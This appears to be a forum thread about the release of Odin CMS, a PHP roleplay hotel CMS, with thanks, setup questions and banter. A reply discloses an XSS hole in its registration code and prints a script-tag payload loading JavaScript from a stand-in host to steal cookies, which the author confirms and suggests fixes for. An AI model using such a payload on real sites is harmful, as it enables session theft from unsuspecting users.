[REL] Odin CMS - Pure Roleplay CMS

[Jonteh]

Don't use it anymore.

Dev thread: https://forum.ragezone.com/f331/odin-cms-mysqli-raintpl-oop-1063274/
Download:

You must be registered to see links

 

[Brought]

Love it, thanks Jonty!

- Gan

 

[rrodo]

I am Spanish, but honestly I loved this cms, I want to know what the db of the cms and uses tables I would like you to answer me.

 

[TheRenchix]

Don't use it anymore.

Dev thread: https://forum.ragezone.com/f331/odin-cms-mysqli-raintpl-oop-1063274/
Download:

You must be registered to see links

mybee you can share database to ?

 

[SebastianaEC]

mybee you can share database to ?

This CMS was coded to work with the emulator that

You must be registered to see links

uses, its a bfly emulator turned into rp emulator from 0 by jonty and i highly doubt he will release the emulator. If you want to use the cms you will have to make it work with your own rp emulator and db, and nice release Jonty this is a clean and good cms.

 

[Matthew-the-man]

I bet there are exploits lol

 

[Jonteh]

I bet there are exploits lol

noobs will be noobs - aka you

 

[Robot]

ahh you released it, awesome release man. :8:

 

[MovieGuy]

I've looked at the source, looks like you have quite a lot of XSS vulnerabilities

you can also pick a username with the skull altcode, so nobody can ban or target you whatsoever

$first_name = (isset($_POST["username"]) ? $core->Filter($_POST["username"]) : null);
//here it just filters the username, so blabla"blabla will become blabla\"blabla, nothing wrong with that, but you can still pick this name

if(is_null($first_name))
{
    $registerErrors[] = "You must enter a username.";
}
//just checks if it's null, nothing wrong with it

$full_name = $first_name;

if(!$users->CheckUsername($full_name))
{
    $registerErrors[] = "That username is unavailable.";
}
//Here it checks if there's the same username already, there's no check what characters you can use whatsoever
//you can just fill in <script src="http://whateverwebsite.com/blabla.js"></script> and steal some cookies!

If I'm wrong, just tell me, but it looks like there's a lot of XSS exploits one can use, this is just one example.

 

[Jonteh]

I've looked at the source, looks like you have quite a lot of XSS vulnerabilities

you can also pick a username with the skull altcode, so nobody can ban or target you whatsoever

$first_name = (isset($_POST["username"]) ? $core->Filter($_POST["username"]) : null);
//here it just filters the username, so blabla"blabla will become blabla\"blabla, nothing wrong with that, but you can still pick this name

if(is_null($first_name))
{
    $registerErrors[] = "You must enter a username.";
}
//just checks if it's null, nothing wrong with it

$full_name = $first_name;

if(!$users->CheckUsername($full_name))
{
    $registerErrors[] = "That username is unavailable.";
}
//Here it checks if there's the same username already, there's no check what characters you can use whatsoever
//you can just fill in <script src="http://whateverwebsite.com/blabla.js"></script> and steal some cookies!

If I'm wrong, just tell me, but it looks like there's a lot of XSS exploits one can use, this is just one example.

you're correct, you can use special characters to create usernames already taken, this CMS is used on iHabiHotel and i patched the issues on his live copy of the CMS

After actually looking at this copy, ive discovered it's NOT the roleplay version i thought it was, this is an edit of odin cms for ihabi.net with issues patched on their live copy

should read the guys post above mine, completely forgot about it. you should be checking for ctype_alnum if you know how. also you could strip tags, str_replace, or use regex to remove anything you dont want in the username. this is something i always overlook when coding a new cms

ahh you released it, awesome release man. :8:

all good dude but please pay attention to my last post and also the post i quoted, this is not a finished product

 

[SebastianaEC]

It is still based on a RP database, but it's easy to change and make it work as for any other emulator, you can finish it yourself too. The hard parts are already finished, and i really like this cms, i already fixed that XSS exploits too which is pretty much the only thing that was wrong with it, and Matthew-the-man "i bet there are exploits" i highly doubt you even know what a exploit is m8, don't let your mind go with what other people say about jonty, you shouldn't even try to trash talk a work of someone that is highly more advanced in coding than you are (if you even code of course)

 

[Brought]

I've changed the theme of the CMS and fixed nearly anything that was wrong with it. I've also recreated a few new addons for it. It is very malleable and I love it. I will post screenshots when I've got a finished product.

 

[Leon Retros]

I found it funny how people take credits for the css and design etc. When I was the one who originally coded this

 

[Jonteh]

I found it funny how people take credits for the css and design etc. When I was the one who originally coded this

theres credits to you in my dev thread i think mate, ive always maintained that i did not design or code any of the css

 

[FullmetalPride]

noobs will be noobs - aka you

You're similar to Rand Paul. Most of the time, I can't agree with you, but every now and then, I'll find myself cheering for you.

 

[xHosts]

Thanks for the release bud.

Mirror for anyone who wants it

You must be registered to see links

 

[Manil Cormac]

@Jonteh why when i connect to the hk and i login it say incorrect login?

 

[Jonteh]

@Jonteh why when i connect to the hk and i login it say incorrect login?

Most likely incorrect rank. Check hk_fuses table.

 

[Manil Cormac]

Most likely incorrect rank. Check hk_fuses table.

I look hk_fuses

You must be registered to see links

i have the rank 11 and it don't work uU